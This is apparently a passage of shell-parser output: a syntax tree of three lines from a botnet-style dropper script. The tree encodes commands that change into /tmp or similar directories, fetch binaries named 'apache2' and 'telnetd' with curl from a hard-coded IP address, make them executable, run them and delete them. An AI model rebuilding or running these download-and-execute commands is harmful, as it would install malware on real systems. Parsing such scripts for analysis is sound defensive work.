  OperatorNode(lineno=27, op='||', pos=(3370, 3372)),
  CommandNode(lineno=27, pos=(3373, 3377), parts=[
    WordNode(lineno=27, pos=(3373, 3375), word='cd'),
    WordNode(lineno=27, pos=(3376, 3377), word='/'),
  ]),
  OperatorNode(lineno=27, op=';', pos=(3377, 3378)),
  CommandNode(lineno=27, pos=(3379, 3410), parts=[
    WordNode(lineno=27, pos=(3379, 3383), word='curl'),
    WordNode(lineno=27, pos=(3384, 3386), word='-O'),
    WordNode(lineno=27, pos=(3387, 3410), word='http://169.57.17.91/ '),
  ]),
  OperatorNode(lineno=27, op=';', pos=(3410, 3411)),
  CommandNode(lineno=27, pos=(3412, 3424), parts=[
    WordNode(lineno=27, pos=(3412, 3417), word='chmod'),
    WordNode(lineno=27, pos=(3418, 3420), word='+x'),
    WordNode(lineno=27, pos=(3421, 3424), word=' '),
  ]),
  OperatorNode(lineno=27, op=';', pos=(3424, 3425)),
  CommandNode(lineno=27, pos=(3426, 3431), parts=[
    WordNode(lineno=27, pos=(3426, 3431), word='./ '),
  ]),
  OperatorNode(lineno=27, op=';', pos=(3431, 3432)),
  CommandNode(lineno=27, pos=(3433, 3443), parts=[
    WordNode(lineno=27, pos=(3433, 3435), word='rm'),
    WordNode(lineno=27, pos=(3436, 3439), word='-rf'),
    WordNode(lineno=27, pos=(3440, 3443), word=' '),
  ]),
])
ListNode(lineno=28, pos=(3444, 3579), parts=[
  CommandNode(lineno=28, pos=(3444, 3451), parts=[
    WordNode(lineno=28, pos=(3444, 3446), word='cd'),
    WordNode(lineno=28, pos=(3447, 3451), word='/tmp'),
  ]),
  OperatorNode(lineno=28, op='||', pos=(3452, 3454)),
  CommandNode(lineno=28, pos=(3455, 3466), parts=[
    WordNode(lineno=28, pos=(3455, 3457), word='cd'),
    WordNode(lineno=28, pos=(3458, 3466), word='/var/run'),
  ]),
  OperatorNode(lineno=28, op='||', pos=(3467, 3469)),
  CommandNode(lineno=28, pos=(3470, 3477), parts=[
    WordNode(lineno=28, pos=(3470, 3472), word='cd'),
    WordNode(lineno=28, pos=(3473, 3477), word='/mnt'),
  ]),
  OperatorNode(lineno=28, op='||', pos=(3478, 3480)),
  CommandNode(lineno=28, pos=(3481, 3489), parts=[
    WordNode(lineno=28, pos=(3481, 3483), word='cd'),
    WordNode(lineno=28, pos=(3484, 3489), word='/root'),
  ]),
  OperatorNode(lineno=28, op='||', pos=(3490, 3492)),
  CommandNode(lineno=28, pos=(3493, 3497), parts=[
    WordNode(lineno=28, pos=(3493, 3495), word='cd'),
    WordNode(lineno=28, pos=(3496, 3497), word='/'),
  ]),
  OperatorNode(lineno=28, op=';', pos=(3497, 3498)),
  CommandNode(lineno=28, pos=(3499, 3534), parts=[
    WordNode(lineno=28, pos=(3499, 3503), word='curl'),
    WordNode(lineno=28, pos=(3504, 3506), word='-O'),
    WordNode(lineno=28, pos=(3507, 3534), word='http://169.57.17.91/apache2'),
  ]),
  OperatorNode(lineno=28, op=';', pos=(3534, 3535)),
  CommandNode(lineno=28, pos=(3536, 3552), parts=[
    WordNode(lineno=28, pos=(3536, 3541), word='chmod'),
    WordNode(lineno=28, pos=(3542, 3544), word='+x'),
    WordNode(lineno=28, pos=(3545, 3552), word='apache2'),
  ]),
  OperatorNode(lineno=28, op=';', pos=(3552, 3553)),
  CommandNode(lineno=28, pos=(3554, 3563), parts=[
    WordNode(lineno=28, pos=(3554, 3563), word='./apache2'),
  ]),
  OperatorNode(lineno=28, op=';', pos=(3563, 3564)),
  CommandNode(lineno=28, pos=(3565, 3579), parts=[
    WordNode(lineno=28, pos=(3565, 3567), word='rm'),
    WordNode(lineno=28, pos=(3568, 3571), word='-rf'),
    WordNode(lineno=28, pos=(3572, 3579), word='apache2'),
  ]),
])
ListNode(lineno=29, pos=(3580, 3715), parts=[
  CommandNode(lineno=29, pos=(3580, 3587), parts=[
    WordNode(lineno=29, pos=(3580, 3582), word='cd'),
    WordNode(lineno=29, pos=(3583, 3587), word='/tmp'),
  ]),
  OperatorNode(lineno=29, op='||', pos=(3588, 3590)),
  CommandNode(lineno=29, pos=(3591, 3602), parts=[
    WordNode(lineno=29, pos=(3591, 3593), word='cd'),
    WordNode(lineno=29, pos=(3594, 3602), word='/var/run'),
  ]),
  OperatorNode(lineno=29, op='||', pos=(3603, 3605)),
  CommandNode(lineno=29, pos=(3606, 3613), parts=[
    WordNode(lineno=29, pos=(3606, 3608), word='cd'),
    WordNode(lineno=29, pos=(3609, 3613), word='/mnt'),
  ]),
  OperatorNode(lineno=29, op='||', pos=(3614, 3616)),
  CommandNode(lineno=29, pos=(3617, 3625), parts=[
    WordNode(lineno=29, pos=(3617, 3619), word='cd'),
    WordNode(lineno=29, pos=(3620, 3625), word='/root'),
  ]),
  OperatorNode(lineno=29, op='||', pos=(3626, 3628)),
  CommandNode(lineno=29, pos=(3629, 3633), parts=[
    WordNode(lineno=29, pos=(3629, 3631), word='cd'),
    WordNode(lineno=29, pos=(3632, 3633), word='/'),
  ]),
  OperatorNode(lineno=29, op=';', pos=(3633, 3634)),
  CommandNode(lineno=29, pos=(3635, 3670), parts=[
    WordNode(lineno=29, pos=(3635, 3639), word='curl'),
    WordNode(lineno=29, pos=(3640, 3642), word='-O'),
    WordNode(lineno=29, pos=(3643, 3670), word='http://169.57.17.91/telnetd'),
  ]),
  OperatorNode(lineno=29, op=';', pos=(3670, 3671)),
  CommandNode(lineno=29, pos=(3672, 3688), parts=[
    WordNode(lineno=29, pos=(3672, 3677), word='chmod'),
    WordNode(lineno=29, pos=(3678, 3680), word='+x'),
    WordNode(lineno=29, pos=(3681, 3688), word='telnetd'),
  ]),
  OperatorNode(lineno=29, op=';', pos=(3688, 3689)),
  CommandNode(lineno=29, pos=(3690, 3699), parts=[
    WordNode(lineno=29, pos=(3690, 3699), word='./telnetd'),
  ]),
  OperatorNode(lineno=29, op=';', pos=(3699, 3700)),
  CommandNode(lineno=29, pos=(3701, 3715), parts=[
    WordNode(lineno=29, pos=(3701, 3703), word='rm'),
    WordNode(lineno=29, pos=(3704, 3707), word='-rf'),
    WordNode(lineno=29, pos=(3708, 3715), word='telnetd'),
  ]),
])
